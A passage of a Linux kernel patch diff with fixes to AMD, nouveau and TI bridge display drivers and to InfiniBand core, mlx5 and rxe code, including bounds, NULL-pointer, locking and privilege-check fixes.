+@@ -117,7 +117,11 @@ static int vcn_v4_0_sw_init(void *handle)
+ 		if (adev->vcn.harvest_config & (1 << i))
+ 			continue;
+ 
+-		atomic_set(&adev->vcn.inst[i].sched_score, 0);
++		/* Init instance 0 sched_score to 1, so it's scheduled after other instances */
++		if (i == 0)
++			atomic_set(&adev->vcn.inst[i].sched_score, 1);
++		else
++			atomic_set(&adev->vcn.inst[i].sched_score, 0);
+ 
+ 		/* VCN UNIFIED TRAP */
+ 		r = amdgpu_irq_add_id(adev, amdgpu_ih_clientid_vcns[i],
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+index 8ab0dd799b3cb..53687de6c0530 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+@@ -83,7 +83,6 @@
+ #include <drm/drm_atomic_uapi.h>
+ #include <drm/drm_atomic_helper.h>
+ #include <drm/drm_blend.h>
+-#include <drm/drm_fb_helper.h>
+ #include <drm/drm_fourcc.h>
+ #include <drm/drm_edid.h>
+ #include <drm/drm_vblank.h>
+@@ -2875,7 +2874,6 @@ const struct amdgpu_ip_block_version dm_ip_block =
+ static const struct drm_mode_config_funcs amdgpu_dm_mode_funcs = {
+ 	.fb_create = amdgpu_display_user_framebuffer_create,
+ 	.get_format_info = amd_get_format_info,
+-	.output_poll_changed = drm_fb_helper_output_poll_changed,
+ 	.atomic_check = amdgpu_dm_atomic_check,
+ 	.atomic_commit = drm_atomic_helper_commit,
+ };
+@@ -6942,7 +6940,13 @@ static int amdgpu_dm_connector_get_modes(struct drm_connector *connector)
+ 				drm_add_modes_noedid(connector, 640, 480);
+ 	} else {
+ 		amdgpu_dm_connector_ddc_get_modes(connector, edid);
+-		amdgpu_dm_connector_add_common_modes(encoder, connector);
++		/* most eDP supports only timings from its edid,
++		 * usually only detailed timings are available
++		 * from eDP edid. timings which are not from edid
++		 * may damage eDP
++		 */
++		if (connector->connector_type != DRM_MODE_CONNECTOR_eDP)
++			amdgpu_dm_connector_add_common_modes(encoder, connector);
+ 		amdgpu_dm_connector_add_freesync_modes(connector, edid);
+ 	}
+ 	amdgpu_dm_fbc_init(connector);
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_0_ppt.c b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_0_ppt.c
+index 508e392547d7a..54fc42dad7755 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_0_ppt.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_0_ppt.c
+@@ -1675,10 +1675,39 @@ static int smu_v13_0_0_set_power_profile_mode(struct smu_context *smu,
+ 		}
+ 	}
+ 
+-	/* conv PP_SMC_POWER_PROFILE* to WORKLOAD_PPLIB_*_BIT */
+-	workload_type = smu_cmn_to_asic_specific_index(smu,
++	if (smu->power_profile_mode == PP_SMC_POWER_PROFILE_COMPUTE &&
++		(((smu->adev->pdev->device == 0x744C) && (smu->adev->pdev->revision == 0xC8)) ||
++		((smu->adev->pdev->device == 0x744C) && (smu->adev->pdev->revision == 0xCC)))) {
++		ret = smu_cmn_update_table(smu,
++					   SMU_TABLE_ACTIVITY_MONITOR_COEFF,
++					   WORKLOAD_PPLIB_COMPUTE_BIT,
++					   (void *)(&activity_monitor_external),
++					   false);
++		if (ret) {
++			dev_err(smu->adev->dev, "[%s] Failed to get activity monitor!", __func__);
++			return ret;
++		}
++
++		ret = smu_cmn_update_table(smu,
++					   SMU_TABLE_ACTIVITY_MONITOR_COEFF,
++					   WORKLOAD_PPLIB_CUSTOM_BIT,
++					   (void *)(&activity_monitor_external),
++					   true);
++		if (ret) {
++			dev_err(smu->adev->dev, "[%s] Failed to set activity monitor!", __func__);
++			return ret;
++		}
++
++		workload_type = smu_cmn_to_asic_specific_index(smu,
++						       CMN2ASIC_MAPPING_WORKLOAD,
++						       PP_SMC_POWER_PROFILE_CUSTOM);
++	} else {
++		/* conv PP_SMC_POWER_PROFILE* to WORKLOAD_PPLIB_*_BIT */
++		workload_type = smu_cmn_to_asic_specific_index(smu,
+ 						       CMN2ASIC_MAPPING_WORKLOAD,
+ 						       smu->power_profile_mode);
++	}
++
+ 	if (workload_type < 0)
+ 		return -EINVAL;
+ 
+diff --git a/drivers/gpu/drm/bridge/ti-sn65dsi86.c b/drivers/gpu/drm/bridge/ti-sn65dsi86.c
+index aeca9c066bf29..d16775c973c4e 100644
+--- a/drivers/gpu/drm/bridge/ti-sn65dsi86.c
++++ b/drivers/gpu/drm/bridge/ti-sn65dsi86.c
+@@ -298,6 +298,10 @@ static void ti_sn_bridge_set_refclk_freq(struct ti_sn65dsi86 *pdata)
+ 		if (refclk_lut[i] == refclk_rate)
+ 			break;
+ 
++	/* avoid buffer overflow and "1" is the default rate in the datasheet. */
++	if (i >= refclk_lut_size)
++		i = 1;
++
+ 	regmap_update_bits(pdata->regmap, SN_DPPLL_SRC_REG, REFCLK_FREQ_MASK,
+ 			   REFCLK_FREQ(i));
+ 
+diff --git a/drivers/gpu/drm/drm_panel_orientation_quirks.c b/drivers/gpu/drm/drm_panel_orientation_quirks.c
+index b1a38e6ce2f8f..0cb646cb04ee1 100644
+--- a/drivers/gpu/drm/drm_panel_orientation_quirks.c
++++ b/drivers/gpu/drm/drm_panel_orientation_quirks.c
+@@ -179,7 +179,7 @@ static const struct dmi_system_id orientation_data[] = {
+ 	}, {	/* AYA NEO AIR */
+ 		.matches = {
+ 		  DMI_EXACT_MATCH(DMI_SYS_VENDOR, "AYANEO"),
+-		  DMI_MATCH(DMI_BOARD_NAME, "AIR"),
++		  DMI_MATCH(DMI_PRODUCT_NAME, "AIR"),
+ 		},
+ 		.driver_data = (void *)&lcd1080x1920_leftside_up,
+ 	}, {	/* AYA NEO NEXT */
+diff --git a/drivers/gpu/drm/nouveau/nouveau_acpi.c b/drivers/gpu/drm/nouveau/nouveau_acpi.c
+index 8cf096f841a90..a2ae8c21e4dce 100644
+--- a/drivers/gpu/drm/nouveau/nouveau_acpi.c
++++ b/drivers/gpu/drm/nouveau/nouveau_acpi.c
+@@ -220,6 +220,9 @@ static void nouveau_dsm_pci_probe(struct pci_dev *pdev, acpi_handle *dhandle_out
+ 	int optimus_funcs;
+ 	struct pci_dev *parent_pdev;
+ 
++	if (pdev->vendor != PCI_VENDOR_ID_NVIDIA)
++		return;
++
+ 	*has_pr3 = false;
+ 	parent_pdev = pci_upstream_bridge(pdev);
+ 	if (parent_pdev) {
+diff --git a/drivers/gpu/drm/nouveau/nouveau_connector.c b/drivers/gpu/drm/nouveau/nouveau_connector.c
+index 1991bbb1d05c3..f40310559d13f 100644
+--- a/drivers/gpu/drm/nouveau/nouveau_connector.c
++++ b/drivers/gpu/drm/nouveau/nouveau_connector.c
+@@ -730,7 +730,8 @@ out:
+ #endif
+ 
+ 	nouveau_connector_set_edid(nv_connector, edid);
+-	nouveau_connector_set_encoder(connector, nv_encoder);
++	if (nv_encoder)
++		nouveau_connector_set_encoder(connector, nv_encoder);
+ 	return status;
+ }
+ 
+@@ -966,7 +967,7 @@ nouveau_connector_get_modes(struct drm_connector *connector)
+ 	/* Determine display colour depth for everything except LVDS now,
+ 	 * DP requires this before mode_valid() is called.
+ 	 */
+-	if (connector->connector_type != DRM_MODE_CONNECTOR_LVDS)
++	if (connector->connector_type != DRM_MODE_CONNECTOR_LVDS && nv_connector->native_mode)
+ 		nouveau_connector_detect_depth(connector);
+ 
+ 	/* Find the native mode if this is a digital panel, if we didn't
+@@ -987,7 +988,7 @@ nouveau_connector_get_modes(struct drm_connector *connector)
+ 	 * "native" mode as some VBIOS tables require us to use the
+ 	 * pixel clock as part of the lookup...
+ 	 */
+-	if (connector->connector_type == DRM_MODE_CONNECTOR_LVDS)
++	if (connector->connector_type == DRM_MODE_CONNECTOR_LVDS && nv_connector->native_mode)
+ 		nouveau_connector_detect_depth(connector);
+ 
+ 	if (nv_encoder->dcb->type == DCB_OUTPUT_TV)
+diff --git a/drivers/gpu/drm/nouveau/nouveau_drm.c b/drivers/gpu/drm/nouveau/nouveau_drm.c
+index fd99ec0f4257a..28062d682f436 100644
+--- a/drivers/gpu/drm/nouveau/nouveau_drm.c
++++ b/drivers/gpu/drm/nouveau/nouveau_drm.c
+@@ -139,10 +139,16 @@ nouveau_name(struct drm_device *dev)
+ static inline bool
+ nouveau_cli_work_ready(struct dma_fence *fence)
+ {
+-	if (!dma_fence_is_signaled(fence))
+-		return false;
+-	dma_fence_put(fence);
+-	return true;
++	bool ret = true;
++
++	spin_lock_irq(fence->lock);
++	if (!dma_fence_is_signaled_locked(fence))
++		ret = false;
++	spin_unlock_irq(fence->lock);
++
++	if (ret == true)
++		dma_fence_put(fence);
++	return ret;
+ }
+ 
+ static void
+diff --git a/drivers/infiniband/core/cma.c b/drivers/infiniband/core/cma.c
+index c6a671edba5c8..4632b1833381a 100644
+--- a/drivers/infiniband/core/cma.c
++++ b/drivers/infiniband/core/cma.c
+@@ -3293,7 +3293,7 @@ static int cma_resolve_iboe_route(struct rdma_id_private *id_priv)
+ 	route->path_rec->traffic_class = tos;
+ 	route->path_rec->mtu = iboe_get_mtu(ndev->mtu);
+ 	route->path_rec->rate_selector = IB_SA_EQ;
+-	route->path_rec->rate = iboe_get_rate(ndev);
++	route->path_rec->rate = IB_RATE_PORT_CURRENT;
+ 	dev_put(ndev);
+ 	route->path_rec->packet_life_time_selector = IB_SA_EQ;
+ 	/* In case ACK timeout is set, use this value to calculate
+@@ -4955,7 +4955,7 @@ static int cma_iboe_join_multicast(struct rdma_id_private *id_priv,
+ 	if (!ndev)
+ 		return -ENODEV;
+ 
+-	ib.rec.rate = iboe_get_rate(ndev);
++	ib.rec.rate = IB_RATE_PORT_CURRENT;
+ 	ib.rec.hop_limit = 1;
+ 	ib.rec.mtu = iboe_get_mtu(ndev->mtu);
+ 
+diff --git a/drivers/infiniband/core/uverbs_cmd.c b/drivers/infiniband/core/uverbs_cmd.c
+index 4796f6a8828ca..e836c9c477f67 100644
+--- a/drivers/infiniband/core/uverbs_cmd.c
++++ b/drivers/infiniband/core/uverbs_cmd.c
+@@ -1850,8 +1850,13 @@ static int modify_qp(struct uverbs_attr_bundle *attrs,
+ 		attr->path_mtu = cmd->base.path_mtu;
+ 	if (cmd->base.attr_mask & IB_QP_PATH_MIG_STATE)
+ 		attr->path_mig_state = cmd->base.path_mig_state;
+-	if (cmd->base.attr_mask & IB_QP_QKEY)
++	if (cmd->base.attr_mask & IB_QP_QKEY) {
++		if (cmd->base.qkey & IB_QP_SET_QKEY && !capable(CAP_NET_RAW)) {
++			ret = -EPERM;
++			goto release_qp;
++		}
+ 		attr->qkey = cmd->base.qkey;
++	}
+ 	if (cmd->base.attr_mask & IB_QP_RQ_PSN)
+ 		attr->rq_psn = cmd->base.rq_psn;
+ 	if (cmd->base.attr_mask & IB_QP_SQ_PSN)
+diff --git a/drivers/infiniband/core/uverbs_main.c b/drivers/infiniband/core/uverbs_main.c
+index d544340887277..fa937cd268219 100644
+--- a/drivers/infiniband/core/uverbs_main.c
++++ b/drivers/infiniband/core/uverbs_main.c
+@@ -222,8 +222,12 @@ static ssize_t ib_uverbs_event_read(struct ib_uverbs_event_queue *ev_queue,
+ 	spin_lock_irq(&ev_queue->lock);
+ 
+ 	while (list_empty(&ev_queue->event_list)) {
+-		spin_unlock_irq(&ev_queue->lock);
++		if (ev_queue->is_closed) {
++			spin_unlock_irq(&ev_queue->lock);
++			return -EIO;
++		}
+ 
++		spin_unlock_irq(&ev_queue->lock);
+ 		if (filp->f_flags & O_NONBLOCK)
+ 			return -EAGAIN;
+ 
+@@ -233,12 +237,6 @@ static ssize_t ib_uverbs_event_read(struct ib_uverbs_event_queue *ev_queue,
+ 			return -ERESTARTSYS;
+ 
+ 		spin_lock_irq(&ev_queue->lock);
+-
+-		/* If device was disassociated and no event exists set an error */
+-		if (list_empty(&ev_queue->event_list) && ev_queue->is_closed) {
+-			spin_unlock_irq(&ev_queue->lock);
+-			return -EIO;
+-		}
+ 	}
+ 
+ 	event = list_entry(ev_queue->event_list.next, struct ib_uverbs_event, list);
+diff --git a/drivers/infiniband/hw/mlx5/fs.c b/drivers/infiniband/hw/mlx5/fs.c
+index 490ec308e3098..5a13d902b0641 100644
+--- a/drivers/infiniband/hw/mlx5/fs.c
++++ b/drivers/infiniband/hw/mlx5/fs.c
+@@ -696,8 +696,6 @@ static struct mlx5_ib_flow_prio *_get_prio(struct mlx5_ib_dev *dev,
+ 	struct mlx5_flow_table_attr ft_attr = {};
+ 	struct mlx5_flow_table *ft;
+ 
+-	if (mlx5_ib_shared_ft_allowed(&dev->ib_dev))
+-		ft_attr.uid = MLX5_SHARED_RESOURCE_UID;
+ 	ft_attr.prio = priority;
+ 	ft_attr.max_fte = num_entries;
+ 	ft_attr.flags = flags;
+@@ -2026,6 +2024,237 @@ static int flow_matcher_cleanup(struct ib_uobject *uobject,
+ 	return 0;
+ }
+ 
++static int steering_anchor_create_ft(struct mlx5_ib_dev *dev,
++				     struct mlx5_ib_flow_prio *ft_prio,
++				     enum mlx5_flow_namespace_type ns_type)
++{
++	struct mlx5_flow_table_attr ft_attr = {};
++	struct mlx5_flow_namespace *ns;
++	struct mlx5_flow_table *ft;
++
++	if (ft_prio->anchor.ft)
++		return 0;
++
++	ns = mlx5_get_flow_namespace(dev->mdev, ns_type);
++	if (!ns)
++		return -EOPNOTSUPP;
++
++	ft_attr.flags = MLX5_FLOW_TABLE_UNMANAGED;
++	ft_attr.uid = MLX5_SHARED_RESOURCE_UID;
++	ft_attr.prio = 0;
++	ft_attr.max_fte = 2;
++	ft_attr.level = 1;
++
++	ft = mlx5_create_flow_table(ns, &ft_attr);
++	if (IS_ERR(ft))
++		return PTR_ERR(ft);
++
++	ft_prio->anchor.ft = ft;
++
++	return 0;
++}
++
++static void steering_anchor_destroy_ft(struct mlx5_ib_flow_prio *ft_prio)
++{
++	if (ft_prio->anchor.ft) {
++		mlx5_destroy_flow_table(ft_prio->anchor.ft);
++		ft_prio->anchor.ft = NULL;
++	}
++}
++
++static int
++steering_anchor_create_fg_drop(struct mlx5_ib_flow_prio *ft_prio)
++{
++	int inlen = MLX5_ST_SZ_BYTES(create_flow_group_in);
++	struct mlx5_flow_group *fg;
++	void *flow_group_in;
++	int err = 0;
++
++	if (ft_prio->anchor.fg_drop)
++		return 0;
++
++	flow_group_in = kvzalloc(inlen, GFP_KERNEL);
++	if (!flow_group_in)
++		return -ENOMEM;
++
++	MLX5_SET(create_flow_group_in, flow_group_in, start_flow_index, 1);
++	MLX5_SET(create_flow_group_in, flow_group_in, end_flow_index, 1);
++
++	fg = mlx5_create_flow_group(ft_prio->anchor.ft, flow_group_in);
++	if (IS_ERR(fg)) {
++		err = PTR_ERR(fg);
++		goto out;
++	}
++
++	ft_prio->anchor.fg_drop = fg;
++
++out:
++	kvfree(flow_group_in);
++
++	return err;
++}
++
++static void
++steering_anchor_destroy_fg_drop(struct mlx5_ib_flow_prio *ft_prio)
++{
++	if (ft_prio->anchor.fg_drop) {
++		mlx5_destroy_flow_group(ft_prio->anchor.fg_drop);
++		ft_prio->anchor.fg_drop = NULL;
++	}
++}
++
++static int
++steering_anchor_create_fg_goto_table(struct mlx5_ib_flow_prio *ft_prio)
++{
++	int inlen = MLX5_ST_SZ_BYTES(create_flow_group_in);
++	struct mlx5_flow_group *fg;
++	void *flow_group_in;
++	int err = 0;
++
++	if (ft_prio->anchor.fg_goto_table)
++		return 0;
++
++	flow_group_in = kvzalloc(inlen, GFP_KERNEL);
++	if (!flow_group_in)
++		return -ENOMEM;
++
++	fg = mlx5_create_flow_group(ft_prio->anchor.ft, flow_group_in);
++	if (IS_ERR(fg)) {
++		err = PTR_ERR(fg);
++		goto out;
++	}
++	ft_prio->anchor.fg_goto_table = fg;
++
++out:
++	kvfree(flow_group_in);
++
++	return err;
++}
++
++static void
++steering_anchor_destroy_fg_goto_table(struct mlx5_ib_flow_prio *ft_prio)
++{
++	if (ft_prio->anchor.fg_goto_table) {
++		mlx5_destroy_flow_group(ft_prio->anchor.fg_goto_table);
++		ft_prio->anchor.fg_goto_table = NULL;
++	}
++}
++
++static int
++steering_anchor_create_rule_drop(struct mlx5_ib_flow_prio *ft_prio)
++{
++	struct mlx5_flow_act flow_act = {};
++	struct mlx5_flow_handle *handle;
++
++	if (ft_prio->anchor.rule_drop)
++		return 0;
++
++	flow_act.fg = ft_prio->anchor.fg_drop;
++	flow_act.action = MLX5_FLOW_CONTEXT_ACTION_DROP;
++
++	handle = mlx5_add_flow_rules(ft_prio->anchor.ft, NULL, &flow_act,
++				     NULL, 0);
++	if (IS_ERR(handle))
++		return PTR_ERR(handle);
++
++	ft_prio->anchor.rule_drop = handle;
++
++	return 0;
++}
++
++static void steering_anchor_destroy_rule_drop(struct mlx5_ib_flow_prio *ft_prio)
++{
++	if (ft_prio->anchor.rule_drop) {
++		mlx5_del_flow_rules(ft_prio->anchor.rule_drop);
++		ft_prio->anchor.rule_drop = NULL;
++	}
++}
++
++static int
++steering_anchor_create_rule_goto_table(struct mlx5_ib_flow_prio *ft_prio)
++{
++	struct mlx5_flow_destination dest = {};
++	struct mlx5_flow_act flow_act = {};
++	struct mlx5_flow_handle *handle;
++
++	if (ft_prio->anchor.rule_goto_table)
++		return 0;
++
++	flow_act.action = MLX5_FLOW_CONTEXT_ACTION_FWD_DEST;
++	flow_act.flags |= FLOW_ACT_IGNORE_FLOW_LEVEL;
++	flow_act.fg = ft_prio->anchor.fg_goto_table;
++
++	dest.type = MLX5_FLOW_DESTINATION_TYPE_FLOW_TABLE;
++	dest.ft = ft_prio->flow_table;
++
++	handle = mlx5_add_flow_rules(ft_prio->anchor.ft, NULL, &flow_act,
++				     &dest, 1);
++	if (IS_ERR(handle))
++		return PTR_ERR(handle);
++
++	ft_prio->anchor.rule_goto_table = handle;
++
++	return 0;
++}
++
++static void
++steering_anchor_destroy_rule_goto_table(struct mlx5_ib_flow_prio *ft_prio)
++{
++	if (ft_prio->anchor.rule_goto_table) {
++		mlx5_del_flow_rules(ft_prio->anchor.rule_goto_table);
++		ft_prio->anchor.rule_goto_table = NULL;
++	}
++}
++
++static int steering_anchor_create_res(struct mlx5_ib_dev *dev,
++				      struct mlx5_ib_flow_prio *ft_prio,
++				      enum mlx5_flow_namespace_type ns_type)
++{
++	int err;
++
++	err = steering_anchor_create_ft(dev, ft_prio, ns_type);
++	if (err)
++		return err;
++
++	err = steering_anchor_create_fg_drop(ft_prio);
++	if (err)
++		goto destroy_ft;
++
++	err = steering_anchor_create_fg_goto_table(ft_prio);
++	if (err)
++		goto destroy_fg_drop;
++
++	err = steering_anchor_create_rule_drop(ft_prio);
++	if (err)
++		goto destroy_fg_goto_table;
++
++	err = steering_anchor_create_rule_goto_table(ft_prio);
++	if (err)
++		goto destroy_rule_drop;
++
++	return 0;
++
++destroy_rule_drop:
++	steering_anchor_destroy_rule_drop(ft_prio);
++destroy_fg_goto_table:
++	steering_anchor_destroy_fg_goto_table(ft_prio);
++destroy_fg_drop:
++	steering_anchor_destroy_fg_drop(ft_prio);
++destroy_ft:
++	steering_anchor_destroy_ft(ft_prio);
++
++	return err;
++}
++
++static void mlx5_steering_anchor_destroy_res(struct mlx5_ib_flow_prio *ft_prio)
++{
++	steering_anchor_destroy_rule_goto_table(ft_prio);
++	steering_anchor_destroy_rule_drop(ft_prio);
++	steering_anchor_destroy_fg_goto_table(ft_prio);
++	steering_anchor_destroy_fg_drop(ft_prio);
++	steering_anchor_destroy_ft(ft_prio);
++}
++
+ static int steering_anchor_cleanup(struct ib_uobject *uobject,
+ 				   enum rdma_remove_reason why,
+ 				   struct uverbs_attr_bundle *attrs)
+@@ -2036,6 +2265,9 @@ static int steering_anchor_cleanup(struct ib_uobject *uobject,
+ 		return -EBUSY;
+ 
+ 	mutex_lock(&obj->dev->flow_db->lock);
++	if (!--obj->ft_prio->anchor.rule_goto_table_ref)
++		steering_anchor_destroy_rule_goto_table(obj->ft_prio);
++
+ 	put_flow_table(obj->dev, obj->ft_prio, true);
+ 	mutex_unlock(&obj->dev->flow_db->lock);
+ 
+@@ -2043,6 +2275,24 @@ static int steering_anchor_cleanup(struct ib_uobject *uobject,
+ 	return 0;
+ }
+ 
++static void fs_cleanup_anchor(struct mlx5_ib_flow_prio *prio,
++			      int count)
++{
++	while (count--)
++		mlx5_steering_anchor_destroy_res(&prio[count]);
++}
++
++void mlx5_ib_fs_cleanup_anchor(struct mlx5_ib_dev *dev)
++{
++	fs_cleanup_anchor(dev->flow_db->prios, MLX5_IB_NUM_FLOW_FT);
++	fs_cleanup_anchor(dev->flow_db->egress_prios, MLX5_IB_NUM_FLOW_FT);
++	fs_cleanup_anchor(dev->flow_db->sniffer, MLX5_IB_NUM_SNIFFER_FTS);
++	fs_cleanup_anchor(dev->flow_db->egress, MLX5_IB_NUM_EGRESS_FTS);
++	fs_cleanup_anchor(dev->flow_db->fdb, MLX5_IB_NUM_FDB_FTS);
++	fs_cleanup_anchor(dev->flow_db->rdma_rx, MLX5_IB_NUM_FLOW_FT);
++	fs_cleanup_anchor(dev->flow_db->rdma_tx, MLX5_IB_NUM_FLOW_FT);
++}
++
+ static int mlx5_ib_matcher_ns(struct uverbs_attr_bundle *attrs,
+ 			      struct mlx5_ib_flow_matcher *obj)
+ {
+@@ -2183,21 +2433,31 @@ static int UVERBS_HANDLER(MLX5_IB_METHOD_STEERING_ANCHOR_CREATE)(
+ 		return -ENOMEM;
+ 
+ 	mutex_lock(&dev->flow_db->lock);
++
+ 	ft_prio = _get_flow_table(dev, priority, ns_type, 0);
+ 	if (IS_ERR(ft_prio)) {
+-		mutex_unlock(&dev->flow_db->lock);
+ 		err = PTR_ERR(ft_prio);
+ 		goto free_obj;
+ 	}
+ 
+ 	ft_prio->refcount++;
+-	ft_id = mlx5_flow_table_id(ft_prio->flow_table);
+-	mutex_unlock(&dev->flow_db->lock);
++
++	if (!ft_prio->anchor.rule_goto_table_ref) {
++		err = steering_anchor_create_res(dev, ft_prio, ns_type);
++		if (err)
++			goto put_flow_table;
++	}
++
++	ft_prio->anchor.rule_goto_table_ref++;
++
++	ft_id = mlx5_flow_table_id(ft_prio->anchor.ft);
+ 
+ 	err = uverbs_copy_to(attrs, MLX5_IB_ATTR_STEERING_ANCHOR_FT_ID,
+ 			     &ft_id, sizeof(ft_id));
+ 	if (err)
+-		goto put_flow_table;
++		goto destroy_res;
++
++	mutex_unlock(&dev->flow_db->lock);
+ 
+ 	uobj->object = obj;
+ 	obj->dev = dev;
+@@ -2206,8 +2466,10 @@ static int UVERBS_HANDLER(MLX5_IB_METHOD_STEERING_ANCHOR_CREATE)(
+ 
+ 	return 0;
+ 
++destroy_res:
++	--ft_prio->anchor.rule_goto_table_ref;
++	mlx5_steering_anchor_destroy_res(ft_prio);
+ put_flow_table:
+-	mutex_lock(&dev->flow_db->lock);
+ 	put_flow_table(dev, ft_prio, true);
+ 	mutex_unlock(&dev->flow_db->lock);
+ free_obj:
+diff --git a/drivers/infiniband/hw/mlx5/fs.h b/drivers/infiniband/hw/mlx5/fs.h
+index ad320adaf3217..b9734904f5f01 100644
+--- a/drivers/infiniband/hw/mlx5/fs.h
++++ b/drivers/infiniband/hw/mlx5/fs.h
+@@ -10,6 +10,7 @@
+ 
+ #if IS_ENABLED(CONFIG_INFINIBAND_USER_ACCESS)
+ int mlx5_ib_fs_init(struct mlx5_ib_dev *dev);
++void mlx5_ib_fs_cleanup_anchor(struct mlx5_ib_dev *dev);
+ #else
+ static inline int mlx5_ib_fs_init(struct mlx5_ib_dev *dev)
+ {
+@@ -21,9 +22,24 @@ static inline int mlx5_ib_fs_init(struct mlx5_ib_dev *dev)
+ 	mutex_init(&dev->flow_db->lock);
+ 	return 0;
+ }
++
++inline void mlx5_ib_fs_cleanup_anchor(struct mlx5_ib_dev *dev) {}
+ #endif
++
+ static inline void mlx5_ib_fs_cleanup(struct mlx5_ib_dev *dev)
+ {
++	/* When a steering anchor is created, a special flow table is also
++	 * created for the user to reference. Since the user can reference it,
++	 * the kernel cannot trust that when the user destroys the steering
++	 * anchor, they no longer reference the flow table.
++	 *
++	 * To address this issue, when a user destroys a steering anchor, only
++	 * the flow steering rule in the table is destroyed, but the table
++	 * itself is kept to deal with the above scenario. The remaining
++	 * resources are only removed when the RDMA device is destroyed, which
++	 * is a safe assumption that all references are gone.
++	 */
++	mlx5_ib_fs_cleanup_anchor(dev);
+ 	kfree(dev->flow_db);
+ }
+ #endif /* _MLX5_IB_FS_H */
+diff --git a/drivers/infiniband/hw/mlx5/main.c b/drivers/infiniband/hw/mlx5/main.c
+index eaa35e1df2a85..3178df55c4d85 100644
+--- a/drivers/infiniband/hw/mlx5/main.c
++++ b/drivers/infiniband/hw/mlx5/main.c
+@@ -4250,6 +4250,9 @@ const struct mlx5_ib_profile raw_eth_profile = {
+ 	STAGE_CREATE(MLX5_IB_STAGE_POST_IB_REG_UMR,
+ 		     mlx5_ib_stage_post_ib_reg_umr_init,
+ 		     NULL),
++	STAGE_CREATE(MLX5_IB_STAGE_DELAY_DROP,
++		     mlx5_ib_stage_delay_drop_init,
++		     mlx5_ib_stage_delay_drop_cleanup),
+ 	STAGE_CREATE(MLX5_IB_STAGE_RESTRACK,
+ 		     mlx5_ib_restrack_init,
+ 		     NULL),
+diff --git a/drivers/infiniband/hw/mlx5/mlx5_ib.h b/drivers/infiniband/hw/mlx5/mlx5_ib.h
+index 4a7f7064bd0eb..8d94e6834e01b 100644
+--- a/drivers/infiniband/hw/mlx5/mlx5_ib.h
++++ b/drivers/infiniband/hw/mlx5/mlx5_ib.h
+@@ -233,8 +233,19 @@ enum {
+ #define MLX5_IB_NUM_SNIFFER_FTS		2
+ #define MLX5_IB_NUM_EGRESS_FTS		1
+ #define MLX5_IB_NUM_FDB_FTS		MLX5_BY_PASS_NUM_REGULAR_PRIOS
++
++struct mlx5_ib_anchor {
++	struct mlx5_flow_table *ft;
++	struct mlx5_flow_group *fg_goto_table;
++	struct mlx5_flow_group *fg_drop;
++	struct mlx5_flow_handle *rule_goto_table;
++	struct mlx5_flow_handle *rule_drop;
++	unsigned int rule_goto_table_ref;
++};
++
+ struct mlx5_ib_flow_prio {
+ 	struct mlx5_flow_table		*flow_table;
++	struct mlx5_ib_anchor		anchor;
+ 	unsigned int			refcount;
+ };
+ 
+@@ -1553,6 +1564,9 @@ static inline bool mlx5_ib_lag_should_assign_affinity(struct mlx5_ib_dev *dev)
+ 	    MLX5_CAP_PORT_SELECTION(dev->mdev, port_select_flow_table_bypass))
+ 		return 0;
+ 
++	if (mlx5_lag_is_lacp_owner(dev->mdev) && !dev->lag_active)
++		return 0;
++
+ 	return dev->lag_active ||
+ 		(MLX5_CAP_GEN(dev->mdev, num_lag_ports) > 1 &&
+ 		 MLX5_CAP_GEN(dev->mdev, lag_tx_port_affinity));
+diff --git a/drivers/infiniband/hw/mlx5/qp.c b/drivers/infiniband/hw/mlx5/qp.c
+index f7d3643b08f50..ac53ed79ca64c 100644
+--- a/drivers/infiniband/hw/mlx5/qp.c
++++ b/drivers/infiniband/hw/mlx5/qp.c
+@@ -1156,6 +1156,9 @@ static int create_raw_packet_qp_tis(struct mlx5_ib_dev *dev,
+ 
+ 	MLX5_SET(create_tis_in, in, uid, to_mpd(pd)->uid);
+ 	MLX5_SET(tisc, tisc, transport_domain, tdn);
++	if (!mlx5_ib_lag_should_assign_affinity(dev) &&
++	    mlx5_lag_is_lacp_owner(dev->mdev))
++		MLX5_SET(tisc, tisc, strict_lag_tx_port_affinity, 1);
+ 	if (qp->flags & IB_QP_CREATE_SOURCE_QPN)
+ 		MLX5_SET(tisc, tisc, underlay_qpn, qp->underlay_qpn);
+ 
+diff --git a/drivers/infiniband/sw/rxe/rxe_net.c b/drivers/infiniband/sw/rxe/rxe_net.c
+index 35f327b9d4b8e..65d16024b3bf6 100644
+--- a/drivers/infiniband/sw/rxe/rxe_net.c
++++ b/drivers/infiniband/sw/rxe/rxe_net.c
+@@ -156,6 +156,9 @@ static int rxe_udp_encap_recv(struct sock *sk, struct sk_buff *skb)
+ 	pkt->mask = RXE_GRH_MASK;
+ 	pkt->paylen = be16_to_cpu(udph->len) - sizeof(*udph);
+ 
++	/* remove udp header */
++	skb_pull(skb, sizeof(struct udphdr));
++
+ 	rxe_rcv(skb);
+ 
+ 	return 0;
+@@ -397,6 +400,9 @@ static int rxe_loopback(struct sk_buff *skb, struct rxe_pkt_info *pkt)
+ 		return -EIO;
+ 	}
+ 
++	/* remove udp header */
++	skb_pull(skb, sizeof(struct udphdr));
++
+ 	rxe_rcv(skb);
+ 
+ 	return 0;
+diff --git a/drivers/infiniband/sw/rxe/rxe_qp.c b/drivers/infiniband/sw/rxe/rxe_qp.c
+index 1f6e006c51c4a..59b2024b34ef4 100644
+--- a/drivers/infiniband/sw/rxe/rxe_qp.c
++++ b/drivers/infiniband/sw/rxe/rxe_qp.c
+@@ -180,6 +180,9 @@ static void rxe_qp_init_misc(struct rxe_dev *rxe, struct rxe_qp *qp,
+ 	spin_lock_init(&qp->rq.producer_lock);
+ 	spin_lock_init(&qp->rq.consumer_lock);
+ 
++	skb_queue_head_init(&qp->req_pkts);
++	skb_queue_head_init(&qp->resp_pkts);
++
+ 	atomic_set(&qp->ssn, 0);
+ 	atomic_set(&qp->skb_out, 0);
+ }
+@@ -240,12 +243,8 @@ static int rxe_qp_init_req(struct rxe_dev *rxe, struct rxe_qp *qp,
+ 	qp->req.opcode		= -1;
+ 	qp->comp.opcode		= -1;
+ 
